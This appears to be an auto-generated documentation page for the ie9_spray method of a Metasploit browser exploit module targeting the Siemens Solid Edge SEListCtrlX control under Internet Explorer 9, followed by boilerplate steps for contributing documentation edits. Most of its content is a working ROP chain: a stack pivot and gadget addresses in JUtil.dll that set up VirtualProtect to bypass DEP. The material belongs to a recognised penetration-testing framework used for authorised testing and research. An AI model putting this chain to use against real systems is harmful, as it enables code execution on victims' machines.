metasploit-framework
https://github.com/rapid7/metasploit-framework
Ruby
Metasploit Framework
MetasploitModule#ie9_spray
JUtil ROP Chain Jutil Base: 0x1d550000 Stack Pivot: jutil_base + 0x000a5843 # xchg eax, esp # ret Adjust Stack: jutil_base + 0x00212f17 # pop # pop # ret 0x1db2e121, # POP EDX # RETN [JUtil.dll] 0x1d5520ca, # ptr to &VirtualProtect() [IAT JUtil.dll] 0x1da0ebeb, # MOV EDX,DWORD PTR DS:[EDX] # RETN [JUtil.dll] 0x1da103d2, # MOV ESI,EDX # RETN [JUtil.dll] 0x1d70e314, # POP EBP # RETN [JUtil.dll] 0x1d5fc8e8, # & jmp esp [JUtil.dll] 0x1d631859, # POP EBX # RETN [JUtil.dll] 0x00000201, # 0x00000201-> ebx 0x1d769cf9, # POP EDX # RETN [JUtil.dll] 0x00000040, # 0x00000040-> edx 0x1d6d2e50, # POP ECX # RETN [JUtil.dll] 0x1da45217, # &Writable location [JUtil.dll] 0x1d632fd1, # POP EDI # RETN [JUtil.dll] 0x1d6839db, # RETN (ROP NOP) [JUtil.dll] 0x1d752439, # POP EAX # RETN [JUtil.dll] 0x90909090, # nop 0x1da4cfe3, # PUSHAD # RETN [JUtil.dll]
Edit
git clone [email protected]:rapid7/metasploit-framework.git
cd metasploit-framework
open modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb
Contribute
# Make a new branchgit checkout -b -your-name--update-docs-MetasploitModule-ie9_spray-for-pr
# Commit to gitgit add modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rbgit commit -m "better docs for MetasploitModule#ie9_spray"
# Open pull requestgem install hub # on a mac you can `brew install hub`
hub fork
git push <your name> -your-name--update-docs-MetasploitModule-ie9_spray-for-pr
hub pull-request
# Celebrate!